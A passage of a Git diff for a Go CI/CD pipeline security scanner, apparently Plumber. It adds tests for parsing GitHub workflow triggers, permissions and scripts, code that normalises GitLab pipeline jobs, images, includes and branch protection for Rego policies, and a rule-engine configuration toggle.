	wfDir := filepath.Join(tmp, ".github", "workflows")
	if err := os.MkdirAll(wfDir, 0o755); err != nil {
		t.Fatal(err)
	}

	// YAML 1.1 booleanism trap: `on` is coerced to `true` unless we use a
	// typed struct. This fixture intentionally uses all three forms.
	fixtures := map[string]string{
		"string-form.yml": `name: str
on: push
jobs:
  job1: { runs-on: ubuntu-latest }
`,
		"list-form.yml": `name: list
on: [push, pull_request]
jobs:
  job2: { runs-on: ubuntu-latest }
`,
		"map-form.yml": `name: map
on:
  pull_request_target:
    types: [opened]
  workflow_run:
    workflows: [CI]
jobs:
  job3: { runs-on: ubuntu-latest }
`,
	}
	for name, content := range fixtures {
		if err := os.WriteFile(filepath.Join(wfDir, name), []byte(content), 0o644); err != nil {
			t.Fatal(err)
		}
	}

	pipeline, partial, err := ScanGitHubWorkflows("owner/repo", "main", tmp)
	if err != nil || len(partial) != 0 {
		t.Fatalf("unexpected: err=%v partial=%v", err, partial)
	}

	got := map[string][]string{}
	for _, j := range pipeline.Jobs {
		got[j.Name] = j.Triggers
	}

	expected := map[string][]string{
		"string-form/job1": {"push"},
		"list-form/job2":   {"pull_request", "push"}, // sorted
		"map-form/job3":    {"pull_request_target", "workflow_run"},
	}
	for name, want := range expected {
		if !stringSliceEqual(got[name], want) {
			t.Errorf("%s: expected triggers %v, got %v", name, want, got[name])
		}
	}
}
+
// stringSliceEqual reports whether a and b hold the same elements in
// the same order. A nil slice and an empty slice compare equal.
func stringSliceEqual(a, b []string) bool {
	if len(a) != len(b) {
		return false
	}
	for i, v := range a {
		if v != b[i] {
			return false
		}
	}
	return true
}
+
// TestScanGitHubWorkflows_PermissionsPropagation verifies that
// workflow-level `permissions:` flow down to jobs that do not declare
// their own, and that both the string-shortcut and map forms of a
// job-level override replace the inherited value.
func TestScanGitHubWorkflows_PermissionsPropagation(t *testing.T) {
	tmp := t.TempDir()
	wfDir := filepath.Join(tmp, ".github", "workflows")
	if err := os.MkdirAll(wfDir, 0o755); err != nil {
		t.Fatal(err)
	}
	workflow := `name: perms
on: push
permissions: write-all # workflow-level
jobs:
  inherit:
    runs-on: ubuntu-latest
  override-string:
    runs-on: ubuntu-latest
    permissions: read-all
  override-map:
    runs-on: ubuntu-latest
    permissions:
      contents: read
      packages: write
`
	if err := os.WriteFile(filepath.Join(wfDir, "perms.yml"), []byte(workflow), 0o644); err != nil {
		t.Fatal(err)
	}

	pipeline, partial, err := ScanGitHubWorkflows("owner/repo", "main", tmp)
	if err != nil || len(partial) != 0 {
		t.Fatalf("unexpected: err=%v partial=%v", err, partial)
	}

	got := map[string]any{}
	for _, j := range pipeline.Jobs {
		got[j.Name] = j.Permissions
	}

	if got["perms/inherit"] != "write-all" {
		t.Errorf("inherit: expected workflow-level write-all, got %#v", got["perms/inherit"])
	}
	if got["perms/override-string"] != "read-all" {
		t.Errorf("override-string: expected read-all, got %#v", got["perms/override-string"])
	}
	mapPerms, ok := got["perms/override-map"].(map[string]string)
	if !ok {
		t.Fatalf("override-map: expected map, got %#v", got["perms/override-map"])
	}
	if mapPerms["contents"] != "read" || mapPerms["packages"] != "write" {
		t.Errorf("override-map: unexpected values: %v", mapPerms)
	}
}
+
// TestScanGitHubWorkflows_StepScriptsPropagation verifies that inline
// `run:` scripts are collected per job (including multi-line blocks),
// while `uses:` steps contribute nothing to Scripts.
func TestScanGitHubWorkflows_StepScriptsPropagation(t *testing.T) {
	tmp := t.TempDir()
	wfDir := filepath.Join(tmp, ".github", "workflows")
	if err := os.MkdirAll(wfDir, 0o755); err != nil {
		t.Fatal(err)
	}

	workflow := `name: scripts
on: push
jobs:
  one-inline:
    runs-on: ubuntu-latest
    steps:
      - run: echo single
  mixed:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: build
        run: |
          echo build
          make all
      - run: echo "${PWD}"
  only-uses:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/setup-node@v4
`
	if err := os.WriteFile(filepath.Join(wfDir, "scripts.yml"), []byte(workflow), 0o644); err != nil {
		t.Fatal(err)
	}

	pipeline, partial, err := ScanGitHubWorkflows("owner/repo", "main", tmp)
	if err != nil || len(partial) != 0 {
		t.Fatalf("unexpected: err=%v partial=%v", err, partial)
	}

	byName := map[string][]string{}
	for _, j := range pipeline.Jobs {
		byName[j.Name] = j.Scripts
	}

	if got := byName["scripts/one-inline"]; len(got) != 1 || got[0] != "echo single" {
		t.Errorf("one-inline: expected [\"echo single\"], got %v", got)
	}
	if got := byName["scripts/mixed"]; len(got) != 2 {
		t.Errorf("mixed: expected 2 run scripts, got %v", got)
	}
	if got := byName["scripts/only-uses"]; len(got) != 0 {
		t.Errorf("only-uses: expected no scripts, got %v", got)
	}
}
+
// TestScanGitHubWorkflows_ParseErrorReportedAsPartial verifies that an
// unparseable workflow file is surfaced as a partial (per-file) error
// rather than aborting the whole scan.
func TestScanGitHubWorkflows_ParseErrorReportedAsPartial(t *testing.T) {
	tmp := t.TempDir()
	wfDir := filepath.Join(tmp, ".github", "workflows")
	if err := os.MkdirAll(wfDir, 0o755); err != nil {
		t.Fatal(err)
	}
	broken := "this: is: : not valid yaml\n - [1,\n"
	if err := os.WriteFile(filepath.Join(wfDir, "broken.yml"), []byte(broken), 0o644); err != nil {
		t.Fatal(err)
	}

	_, partial, err := ScanGitHubWorkflows("owner/repo", "main", tmp)
	if err != nil {
		t.Fatalf("expected no fatal error, got %v", err)
	}
	if len(partial) != 1 {
		t.Fatalf("expected 1 partial error, got %d: %v", len(partial), partial)
	}
}
diff --git a/collector/gitlab_ir.go b/collector/gitlab_ir.go
new file mode 100644
index 0000000..12fdc9c
--- /dev/null
+++ b/collector/gitlab_ir.go
@@ -0,0 +1,588 @@
+package collector
+
+import (
+ "encoding/json"
+ "fmt"
+ "regexp"
+ "sort"
+ "strings"
+
+ "gopkg.in/yaml.v2"
+
+ "github.com/getplumber/plumber/gitlab"
+ "github.com/getplumber/plumber/internal/ir"
+ "github.com/getplumber/plumber/utils"
+)
+
// overridesRegex matches CI/CD keywords that, when redefined on a job
// inherited from an include/component/template, meaningfully override
// the upstream behaviour. It is applied to the job's JSON serialisation,
// so the pattern looks for quoted keys ("script":); the single capture
// group is the keyword name. Kept in sync with control/utils.go.
var overridesRegex = regexp.MustCompile(`(?i)"(after_script|allow_failure|artifacts|before_script|cache|coverage|dast_configuration|dependencies|environment|identity|image|inherit|interruptible|manual_confirmation|needs|pages|parallel|release|resource_group|retry|rules|script|secrets|services|stage|tags|timeout|trigger|when)":`)
+
// ToNormalizedPipeline projects the GitLab collector outputs onto a
// provider-agnostic IR. Phase 1b: only the fields required by the first
// rule ported to Rego (image/mutable_tag) are mapped. Additional fields
// (services, includes, branch protection, etc.) will be filled in as
// each rule is migrated.
//
// Any of origin/images/protection may be nil; the corresponding IR
// sections are simply left empty.
//
// This function is pure: no I/O, no external state. It is safe to call
// from tests with hand-built fixtures.
func ToNormalizedPipeline(
	projectPath string,
	defaultBranch string,
	ciConfigPath string,
	origin *GitlabPipelineOriginData,
	images *GitlabPipelineImageData,
	protection *GitlabProtectionAnalysisData,
) *ir.NormalizedPipeline {
	pipeline := &ir.NormalizedPipeline{
		Provider:      ir.ProviderGitLab,
		ProjectPath:   projectPath,
		DefaultBranch: defaultBranch,
	}

	// Jobs are enriched with their resolved image (if the image
	// collector ran) and with file:line hints from the raw CI YAML.
	imagesByJob := indexImagesByJob(images)
	pipeline.Jobs = buildJobs(origin, imagesByJob, ciConfigPath)
	pipeline.Includes = buildIncludes(origin)
	pipeline.Branches = buildBranches(protection)
	if origin != nil && origin.MergedConf != nil {
		if globals := extractGitLabVariables(origin.MergedConf.GlobalVariables); len(globals) > 0 {
			pipeline.GlobalVariables = globals
		}
	}

	return pipeline
}
+
// buildBranches flattens the GitLab protection API response into
// ir.Branch entries. Each repository branch is matched against the
// declared protection patterns; when a pattern matches, its settings
// are attached so policies can reason about them. Only the first
// matching pattern wins (hence the break). Returns nil when there is
// no protection data.
func buildBranches(protection *GitlabProtectionAnalysisData) []ir.Branch {
	if protection == nil || len(protection.Branches) == 0 {
		return nil
	}
	out := make([]ir.Branch, 0, len(protection.Branches))
	for _, name := range protection.Branches {
		branch := ir.Branch{Name: name}
		for i := range protection.BranchProtections {
			p := &protection.BranchProtections[i]
			if !gitlab.BranchMatchesPattern(p.ProtectionPattern, name) {
				continue
			}
			branch.Protected = true
			branch.ProtectionPattern = p.ProtectionPattern
			branch.AllowForcePush = p.AllowForcePush
			branch.CodeOwnerApprovalRequired = p.CodeOwnerApprovalRequired
			// GitLab serialises the access lists as arrays of role
			// entries. The scalar `MinXxxAccessLevel` field on the
			// upstream model stays zero because no API path populates
			// it; reduce the arrays to a single int — the minimum
			// access level required — so policies and consumers see
			// the effective bar v0.2.x reported.
			branch.MinPushAccessLevel = _minAccessLevel(p.PushAccessLevels)
			branch.MinMergeAccessLevel = _minAccessLevel(p.MergeAccessLevels)
			break
		}
		out = append(out, branch)
	}
	return out
}
+
+// _minAccessLevel returns the smallest accessLevel found in the list,
+// matching how GitLab itself surfaces the "minimum required level"
+// for push or merge rules. Returns 0 when the list is empty.
+func _minAccessLevel(levels []gitlab.BranchProtectionAccessLevel) int {
+ min := 0
+ for i, l := range levels {
+ if i == 0 || l.AccessLevel < min {
+ min = l.AccessLevel
+ }
+ }
+ return min
+}
+
// buildIncludes flattens pipelineOriginData.Origins into a list of
// ir.Include entries. The Ref field carries the version the project
// currently pins the include to; Current carries the upstream latest
// version resolved by the collector (or empty if no Plumber metadata
// is available for this origin). Path/AltPath expose normalized forms
// for policy-side comparison, and OverriddenJobs enumerates the jobs
// redefined locally with forbidden CI/CD keys. Returns nil when there
// are no origins.
func buildIncludes(origin *GitlabPipelineOriginData) []ir.Include {
	if origin == nil || len(origin.Origins) == 0 {
		return nil
	}
	out := make([]ir.Include, 0, len(origin.Origins))
	for i := range origin.Origins {
		o := &origin.Origins[i]
		inc := ir.Include{
			Kind:          o.OriginType,
			Source:        o.GitlabIncludeOrigin.Location,
			Ref:           o.Version,
			Current:       o.PlumberOrigin.LatestVersion,
			Nested:        o.Nested,
			ComponentName: o.GitlabComponent.ComponentName,
			OriginHash:    o.OriginHash,
		}
		// Component includes carry their location/version on the
		// component sub-struct; fall back to those when the generic
		// include fields are empty.
		if inc.Source == "" && o.GitlabComponent.ComponentIncludePath != "" {
			inc.Source = o.GitlabComponent.ComponentIncludePath
		}
		if inc.Current == "" && o.GitlabComponent.ComponentLatestVersion != "" {
			inc.Current = o.GitlabComponent.ComponentLatestVersion
		}
		if inc.Source != "" {
			inc.Path = utils.CleanOriginPath(inc.Source)
			// Template matching also accepts the extension-less form.
			trimmed := strings.TrimSuffix(inc.Path, ".yml")
			trimmed = strings.TrimSuffix(trimmed, ".yaml")
			if trimmed != inc.Path {
				inc.AltPath = trimmed
			}
		}
		if o.FromPlumber && o.PlumberOrigin.Path != "" && o.PlumberOrigin.Path != inc.Path {
			// Plumber-augmented templates carry an authoritative path
			// that differs from the raw GitLab include location.
			if inc.Path == "" {
				inc.Path = o.PlumberOrigin.Path
			} else if inc.AltPath == "" || inc.AltPath == inc.Path {
				inc.AltPath = o.PlumberOrigin.Path
			}
		}
		inc.OverriddenJobs = CollectOverriddenJobs(o, origin)
		out = append(out, inc)
	}
	return out
}
+
// CollectOverriddenJobs returns the jobs inherited from origin that were
// locally redefined with forbidden CI/CD keys. The IR uses it to expose
// override metadata to Rego policies; the PBOM generator reuses it so
// both paths share the same rule for what counts as an override.
// Duplicate job names are de-duplicated (first occurrence wins);
// overrides whose local content matches no forbidden key are dropped.
func CollectOverriddenJobs(o *GitlabPipelineOriginDataFull, data *GitlabPipelineOriginData) []ir.OverriddenJob {
	if o == nil || data == nil {
		return nil
	}
	seen := make(map[string]bool)
	var out []ir.OverriddenJob
	for _, job := range o.Jobs {
		if !job.IsOverridden || seen[job.Name] {
			continue
		}
		seen[job.Name] = true
		// The hardcoded content map holds the raw local redefinition;
		// forbiddenOverrideKeys extracts which CI/CD keys it touches.
		keys := forbiddenOverrideKeys(data.JobHardcodedContent[job.Name])
		if len(keys) == 0 {
			continue
		}
		out = append(out, ir.OverriddenJob{Name: job.Name, Keys: keys})
	}
	return out
}
+
+func forbiddenOverrideKeys(job interface{}) []string {
+ if job == nil {
+ return nil
+ }
+ serializable := convertOverrideSerializable(job)
+ jobJSON, err := json.Marshal(serializable)
+ if err != nil {
+ return nil
+ }
+ matches := overridesRegex.FindAllSubmatch(jobJSON, -1)
+ if len(matches) == 0 {
+ return nil
+ }
+ seen := make(map[string]bool)
+ var keys []string
+ for _, m := range matches {
+ key := string(m[1])
+ if seen[key] {
+ continue
+ }
+ seen[key] = true
+ keys = append(keys, key)
+ }
+ return keys
+}
+
// convertOverrideSerializable recursively rewrites yaml.v2's
// map[interface{}]interface{} shapes into map[string]interface{} so the
// value can be passed to encoding/json. Non-string map keys are
// stringified with fmt; scalars pass through untouched.
func convertOverrideSerializable(input interface{}) interface{} {
	switch node := input.(type) {
	case map[interface{}]interface{}:
		out := make(map[string]interface{}, len(node))
		for k, val := range node {
			name, ok := k.(string)
			if !ok {
				name = fmt.Sprintf("%v", k)
			}
			out[name] = convertOverrideSerializable(val)
		}
		return out
	case map[string]interface{}:
		out := make(map[string]interface{}, len(node))
		for k, val := range node {
			out[k] = convertOverrideSerializable(val)
		}
		return out
	case []interface{}:
		out := make([]interface{}, len(node))
		for i, item := range node {
			out[i] = convertOverrideSerializable(item)
		}
		return out
	}
	return input
}
+
+func indexImagesByJob(images *GitlabPipelineImageData) map[string]ir.Image {
+ if images == nil {
+ return nil
+ }
+ out := make(map[string]ir.Image, len(images.Images))
+ for _, info := range images.Images {
+ out[info.Job] = imageFromInfo(info)
+ }
+ return out
+}
+
+func imageFromInfo(info GitlabPipelineImageInfo) ir.Image {
+ // info.Link may be "registry/name:tag" or "registry/name@sha256:..."
+ // info.Tag / info.Registry are already split by the collector.
+ img := ir.Image{
+ Name: info.Name,
+ Tag: info.Tag,
+ Registry: info.Registry,
+ }
+ if idx := strings.Index(info.Link, "@"); idx >= 0 {
+ img.Digest = info.Link[idx+1:]
+ }
+ return img
+}
+
// buildJobs projects the collector's JobMap onto []ir.Job, enriching
// each entry with its resolved image, origin kind (hardcoded vs
// inherited), override metadata, file:line hints, merged-config data
// and local variables. The result is sorted by name for determinism.
func buildJobs(origin *GitlabPipelineOriginData, imagesByJob map[string]ir.Image, ciConfigPath string) []ir.Job {
	if origin == nil || len(origin.JobMap) == 0 {
		return nil
	}
	// The raw CI YAML carries only the root-file job headers; jobs
	// pulled in via include/component have a different source file
	// that the collector does not track per-job yet. Scanning the
	// root string at least covers hardcoded jobs, which is the main
	// class of findings users click through.
	lineByJob := scanGitLabJobLines(origin.ConfString)
	originKindByJob := indexJobOriginKind(origin)
	overrideKeysByJob := indexOverrideKeys(origin)
	jobs := make([]ir.Job, 0, len(origin.JobMap))
	for name, data := range origin.JobMap {
		if data == nil {
			continue
		}
		job := ir.Job{Name: name}
		if img, ok := imagesByJob[name]; ok {
			job.Image = &img
		}
		// "hardcoded" (defined in the root file) takes precedence
		// over whatever origin kind the include analysis assigned.
		switch {
		case origin.JobHardcodedMap != nil && origin.JobHardcodedMap[name]:
			job.OriginKind = "hardcoded"
		case originKindByJob[name] != "":
			job.OriginKind = originKindByJob[name]
		}
		if data.IsOverridden {
			job.Overridden = true
			if keys := overrideKeysByJob[name]; len(keys) > 0 {
				job.OverriddenKeys = keys
			}
		}
		if line, ok := lineByJob[name]; ok {
			job.OriginFile = ciConfigPath
			job.OriginLine = line
		}
		enrichFromMergedConf(&job, name, origin.MergedConf)
		enrichLocalVariables(&job, name, origin.Conf)
		jobs = append(jobs, job)
	}
	// Deterministic order so the IR (and downstream findings) do not
	// depend on Go's randomized map iteration.
	sort.Slice(jobs, func(i, j int) bool { return jobs[i].Name < jobs[j].Name })
	return jobs
}
+
// gitlabJobHeaderRe matches a top-level (column-0) GitLab CI mapping
// key with an optional trailing comment. Compiled once at package
// scope so repeated scans do not pay the regexp compilation cost.
var gitlabJobHeaderRe = regexp.MustCompile(`^([A-Za-z_][A-Za-z0-9_.:-]*)\s*:\s*(#.*)?$`)

// gitlabReservedTopLevelKeys lists GitLab CI top-level keys that are
// configuration, not jobs, and must never be reported as job headers.
var gitlabReservedTopLevelKeys = map[string]struct{}{
	"stages": {}, "variables": {}, "default": {}, "include": {},
	"workflow": {}, "image": {}, "services": {}, "before_script": {},
	"after_script": {}, "cache": {},
}

// scanGitLabJobLines returns a map from top-level job name to its
// 1-based line number in raw. Job headers are lines whose key starts
// in column 1 and that end with `:` (optionally followed by a
// comment). Reserved GitLab keys (stages, variables, include,
// workflow, default, image, services, before_script, after_script,
// cache) are skipped, and the first occurrence of a name wins.
// Anchors, YAML refs and nested jobs are not modeled - this is a
// lightweight hint, not a parser. Returns an empty (non-nil) map for
// empty input.
func scanGitLabJobLines(raw string) map[string]int {
	out := map[string]int{}
	if raw == "" {
		return out
	}
	for i, line := range strings.Split(raw, "\n") {
		m := gitlabJobHeaderRe.FindStringSubmatch(line)
		if m == nil {
			continue
		}
		name := m[1]
		if _, skip := gitlabReservedTopLevelKeys[name]; skip {
			continue
		}
		if _, seen := out[name]; seen {
			continue
		}
		out[name] = i + 1
	}
	return out
}
+
+// indexOverrideKeys returns a map of job name -> list of CI/CD keys
+// the project redefined when overriding an upstream definition.
+// Reuses CollectOverriddenJobs so the IR's per-job marker stays in
+// sync with the PBOM's "overriddenKeys" surface β both paths share
+// one definition of "what counts as an override".
+func indexOverrideKeys(origin *GitlabPipelineOriginData) map[string][]string {
+ if origin == nil {
+ return nil
+ }
+ out := make(map[string][]string)
+ for i := range origin.Origins {
+ o := &origin.Origins[i]
+ for _, ov := range CollectOverriddenJobs(o, origin) {
+ if _, seen := out[ov.Name]; seen {
+ continue
+ }
+ out[ov.Name] = ov.Keys
+ }
+ }
+ return out
+}
+
+// indexJobOriginKind walks origin.Origins and returns a map of job
+// name -> origin type ("component", "template", "local", "remote",
+// "project"). Plumber tracks how each job entered the merged config;
+// rules that should not punish projects for using upstream catalogs
+// (e.g. job_variable_override) consult this map to skip imported
+// jobs. Hardcoded jobs are handled via JobHardcodedMap and stay
+// out of this index.
+func indexJobOriginKind(origin *GitlabPipelineOriginData) map[string]string {
+ if origin == nil || len(origin.Origins) == 0 {
+ return nil
+ }
+ out := make(map[string]string)
+ for i := range origin.Origins {
+ o := &origin.Origins[i]
+ for _, job := range o.Jobs {
+ if _, seen := out[job.Name]; seen {
+ continue
+ }
+ out[job.Name] = o.OriginType
+ }
+ }
+ return out
+}
+
+// enrichLocalVariables sets job.LocalVariables to the variables block
+// authored directly in the project's CI file. Read from the raw,
+// pre-merge conf so upstream-component / template-defined variables
+// stay out: that distinction is what variable-override policies
+// (ISSUE-205) need to avoid punishing projects for variables their
+// catalogs already ship. When the project did not declare a local
+// `variables:` block on this job (or did not redeclare the job at
+// all), the field is left nil.
+func enrichLocalVariables(job *ir.Job, name string, conf *gitlab.GitlabCIConf) {
+ if conf == nil {
+ return
+ }
+ rawJob, ok := conf.GitlabJobs[name]
+ if !ok {
+ return
+ }
+ data, err := yaml.Marshal(rawJob)
+ if err != nil {
+ return
+ }
+ var parsed gitlab.GitlabJob
+ if err := yaml.Unmarshal(data, &parsed); err != nil {
+ return
+ }
+ if vars := extractGitLabVariables(parsed.Variables); len(vars) > 0 {
+ job.LocalVariables = vars
+ }
+}
+
+// enrichFromMergedConf harvests the GitLab CI merged configuration to
+// populate job.Services, job.Variables and job.Scripts. The merged
+// conf holds each job as an opaque interface{}; we YAML-round-trip it
+// into gitlab.GitlabJob so we can read the typed fields.
+func enrichFromMergedConf(job *ir.Job, name string, conf *gitlab.GitlabCIConf) {
+ if conf == nil {
+ return
+ }
+ rawJob, ok := conf.GitlabJobs[name]
+ if !ok {
+ return
+ }
+ data, err := yaml.Marshal(rawJob)
+ if err != nil {
+ return
+ }
+ var parsed gitlab.GitlabJob
+ if err := yaml.Unmarshal(data, &parsed); err != nil {
+ return
+ }
+ if svc := extractGitLabServices(parsed.Services); len(svc) > 0 {
+ job.Services = svc
+ }
+ if vars := extractGitLabVariables(parsed.Variables); len(vars) > 0 {
+ job.Variables = vars
+ }
+ // Concatenate `before_script`, `script` and `after_script` so
+ // every shell line β including hooks β is visible to scripts-
+ // scanning rules. The runtime executes all three blocks in the
+ // same shell context, which is also where shell-reparse and
+ // variable-injection patterns live. Track the source block per
+ // line so policies can echo it back in their findings.
+ var scripts []string
+ var blocks []string
+ for _, pair := range []struct {
+ name string
+ raw any
+ }{
+ {"before_script", parsed.BeforeScript},
+ {"script", parsed.Script},
+ {"after_script", parsed.AfterScript},
+ } {
+ for _, line := range extractGitLabScripts(pair.raw) {
+ scripts = append(scripts, line)
+ blocks = append(blocks, pair.name)
+ }
+ }
+ if len(scripts) > 0 {
+ job.Scripts = scripts
+ job.ScriptBlocks = blocks
+ }
+ if af, ok := parsed.AllowFailure.(bool); ok {
+ job.AllowFailure = af
+ }
+ if w, ok := parsed.When.(string); ok {
+ job.When = w
+ }
+ if rules := extractGitLabRules(parsed.Rules); len(rules) > 0 {
+ job.Rules = rules
+ }
+}
+
+// extractGitLabRules normalises the polymorphic `rules:` block into a
+// slice of {key: any} maps. yaml.v2 nests as map[interface{}]any
+// while v3 uses map[string]any; convert recursively to the latter so
+// the IR can be JSON-marshalled (Go's json package refuses non-string
+// map keys) and policies see a single shape.
+func extractGitLabRules(v any) []map[string]any {
+ list, ok := v.([]any)
+ if !ok {
+ return nil
+ }
+ out := make([]map[string]any, 0, len(list))
+ for _, entry := range list {
+ if m, ok := normalizeYAMLValue(entry).(map[string]any); ok && len(m) > 0 {
+ out = append(out, m)
+ }
+ }
+ return out
+}
+
// normalizeYAMLValue recursively walks a value coming out of yaml.v2
// and rewrites every map[interface{}]interface{} as map[string]any so
// the result is JSON-marshallable. Non-string map keys are silently
// dropped; scalars and unknown types pass through unchanged.
func normalizeYAMLValue(v any) any {
	switch val := v.(type) {
	case map[interface{}]interface{}:
		m := make(map[string]any, len(val))
		for key, inner := range val {
			s, isString := key.(string)
			if !isString {
				continue
			}
			m[s] = normalizeYAMLValue(inner)
		}
		return m
	case map[string]interface{}:
		m := make(map[string]any, len(val))
		for key, inner := range val {
			m[key] = normalizeYAMLValue(inner)
		}
		return m
	case []interface{}:
		list := make([]any, len(val))
		for i := range val {
			list[i] = normalizeYAMLValue(val[i])
		}
		return list
	default:
		return v
	}
}
+
+// extractGitLabServices normalizes the polymorphic services: block
+// (list of strings, list of {name: β¦} maps) into a flat list of
+// ir.Image entries.
+func extractGitLabServices(v any) []ir.Image {
+ list, ok := v.([]any)
+ if !ok {
+ return nil
+ }
+ out := make([]ir.Image, 0, len(list))
+ for _, item := range list {
+ switch s := item.(type) {
+ case string:
+ out = append(out, splitServiceRef(s))
+ case map[any]any:
+ if name, ok := s["name"].(string); ok {
+ out = append(out, splitServiceRef(name))
+ }
+ }
+ }
+ return out
+}
+
// extractGitLabVariables collapses the YAML-typed variables map into a
// string-to-string map so Rego sees everything as plain strings.
// Returns nil for an empty or nil input.
func extractGitLabVariables(v map[string]any) map[string]string {
	if len(v) == 0 {
		return nil
	}
	flat := make(map[string]string, len(v))
	for key, raw := range v {
		flat[key] = fmt.Sprint(raw)
	}
	return flat
}
+
// extractGitLabScripts flattens the polymorphic `script:` block (a
// single string or a list) into a list of script lines. Non-string
// list items are skipped; any other input shape yields nil.
func extractGitLabScripts(v any) []string {
	if single, isString := v.(string); isString {
		return []string{single}
	}
	list, isList := v.([]any)
	if !isList {
		return nil
	}
	lines := make([]string, 0, len(list))
	for _, entry := range list {
		if s, isString := entry.(string); isString {
			lines = append(lines, s)
		}
	}
	return lines
}
+
+func splitServiceRef(ref string) ir.Image {
+ if idx := strings.LastIndex(ref, ":"); idx > 0 {
+ return ir.Image{Name: ref[:idx], Tag: ref[idx+1:]}
+ }
+ return ir.Image{Name: ref}
+}
diff --git a/collector/gitlab_ir_test.go b/collector/gitlab_ir_test.go
new file mode 100644
index 0000000..6c4d2e7
--- /dev/null
+++ b/collector/gitlab_ir_test.go
@@ -0,0 +1,81 @@
+package collector
+
+import (
+ "testing"
+
+ "github.com/getplumber/plumber/internal/ir"
+)
+
+func TestToNormalizedPipeline_Empty(t *testing.T) {
+ pipeline := ToNormalizedPipeline("group/project", "main", "", nil, nil, nil)
+ if pipeline.Provider != ir.ProviderGitLab {
+ t.Fatalf("expected provider gitlab, got %q", pipeline.Provider)
+ }
+ if pipeline.ProjectPath != "group/project" {
+ t.Fatalf("expected project path propagated, got %q", pipeline.ProjectPath)
+ }
+ if pipeline.DefaultBranch != "main" {
+ t.Fatalf("expected default branch propagated, got %q", pipeline.DefaultBranch)
+ }
+ if len(pipeline.Jobs) != 0 {
+ t.Fatalf("expected no jobs, got %d", len(pipeline.Jobs))
+ }
+}
+
+func TestToNormalizedPipeline_JobsAndImages(t *testing.T) {
+ origin := &GitlabPipelineOriginData{
+ JobMap: map[string]*GitlabPipelineJobData{
+ "build": {Name: "build"},
+ "deploy": {Name: "deploy"},
+ "lint": {Name: "lint"},
+ },
+ }
+ images := &GitlabPipelineImageData{
+ Images: []GitlabPipelineImageInfo{
+ {Job: "build", Link: "docker.io/alpine:3.20", Name: "alpine", Tag: "3.20"},
+ {Job: "deploy", Link: "registry.example.com/deployer@sha256:abcdef", Name: "deployer"},
+ },
+ }
+
+ pipeline := ToNormalizedPipeline("grp/proj", "main", "", origin, images, nil)
+
+ if got := len(pipeline.Jobs); got != 3 {
+ t.Fatalf("expected 3 jobs, got %d", got)
+ }
+
+ // Sorted alphabetically: build, deploy, lint
+ names := []string{pipeline.Jobs[0].Name, pipeline.Jobs[1].Name, pipeline.Jobs[2].Name}
+ expected := []string{"build", "deploy", "lint"}
+ for i := range names {
+ if names[i] != expected[i] {
+ t.Fatalf("jobs[%d]: expected %q, got %q", i, expected[i], names[i])
+ }
+ }
+
+ if pipeline.Jobs[0].Image == nil || pipeline.Jobs[0].Image.Tag != "3.20" {
+ t.Fatalf("build job image: expected tag 3.20, got %+v", pipeline.Jobs[0].Image)
+ }
+ if pipeline.Jobs[1].Image == nil || pipeline.Jobs[1].Image.Digest != "sha256:abcdef" {
+ t.Fatalf("deploy job image: expected digest sha256:abcdef, got %+v", pipeline.Jobs[1].Image)
+ }
+ if pipeline.Jobs[2].Image != nil {
+ t.Fatalf("lint job: expected no image, got %+v", pipeline.Jobs[2].Image)
+ }
+}
+
+func TestToNormalizedPipeline_NilJobInMap(t *testing.T) {
+ origin := &GitlabPipelineOriginData{
+ JobMap: map[string]*GitlabPipelineJobData{
+ "valid": {Name: "valid"},
+ "corrupted": nil,
+ },
+ }
+
+ pipeline := ToNormalizedPipeline("grp/proj", "main", "", origin, nil, nil)
+ if got := len(pipeline.Jobs); got != 1 {
+ t.Fatalf("expected 1 job (nil entry skipped), got %d", got)
+ }
+ if pipeline.Jobs[0].Name != "valid" {
+ t.Fatalf("expected valid job kept, got %q", pipeline.Jobs[0].Name)
+ }
+}
diff --git a/collector/testmain_test.go b/collector/testmain_test.go
new file mode 100644
index 0000000..ad98615
--- /dev/null
+++ b/collector/testmain_test.go
@@ -0,0 +1,16 @@
+package collector
+
+import (
+ "os"
+ "testing"
+)
+
// TestMain disables the GitHub metadata enrichment for collector
// tests by exporting PLUMBER_DISABLE_GITHUB_API before any test runs.
// Dedicated tests that need the client can override by unsetting
// PLUMBER_DISABLE_GITHUB_API in their t.Setenv scope.
func TestMain(m *testing.M) {
	err := os.Setenv("PLUMBER_DISABLE_GITHUB_API", "1")
	if err != nil {
		panic(err)
	}
	os.Exit(m.Run())
}
diff --git a/configuration/plumberconfig.go b/configuration/plumberconfig.go
index 4f222e1..e10f0cd 100644
--- a/configuration/plumberconfig.go
+++ b/configuration/plumberconfig.go
@@ -57,6 +57,9 @@ var validControlSchema = map[string][]string{
"pipelineMustNotUseDockerInDocker": {
"enabled", "detectInsecureDaemon",
},
+ "actionsMustBePinnedByCommitSha": {
+ "enabled", "trustedOwners",
+ },
}
// validControlKeys returns the list of known control names.
@@ -75,6 +78,9 @@ func ValidControlNames() []string {
return names
}
// validEngineKeys lists the sub-keys recognized under the top-level
// "engine" section; ValidFlatKeys expands them to "engine.<key>".
var validEngineKeys = []string{"enabled"}
+
// ValidFlatKeys returns every valid flattened key path recognized by the
// schema, e.g. "controls.branchMustBeProtected.enabled". This includes
// keys that may be commented out in the default config file.
@@ -85,6 +91,9 @@ func ValidFlatKeys() map[string]struct{} {
keys["controls."+control+"."+sub] = struct{}{}
}
}
+ for _, sub := range validEngineKeys {
+ keys["engine."+sub] = struct{}{}
+ }
return keys
}
@@ -95,6 +104,28 @@ type PlumberConfig struct {
// Controls configuration
Controls ControlsConfig `yaml:"controls"`
+
+	// Engine configuration for the Rego/OPA rule engine (multi-provider refactor).
+	// When Enabled is explicitly false, the legacy Go controls run alone; a nil
+	// section or unset field defaults to enabled (see IsEngineEnabled).
+ Engine *EngineConfig `yaml:"engine,omitempty"`
+}
+
// EngineConfig configures the Rego/OPA rule engine introduced by the
// multi-provider refactor.
type EngineConfig struct {
	// Enabled turns on the Rego/OPA rule engine. Default: true — a nil
	// section or unset field counts as enabled (see IsEngineEnabled).
	// The engine runs in shadow mode alongside the legacy Go controls
	// until they are removed; see docs/REFACTOR_MULTI_PROVIDER.md §8.
	Enabled *bool `yaml:"enabled,omitempty"`
}
+
+// IsEngineEnabled returns true when the Rego/OPA engine must run.
+// Defaults to true when the section, the field, or the config itself is nil.
+func (c *PlumberConfig) IsEngineEnabled() bool {
+ if c == nil || c.Engine == nil || c.Engine.Enabled == nil {
+ return true
+ }
+ return *c.Engine.Enabled
}
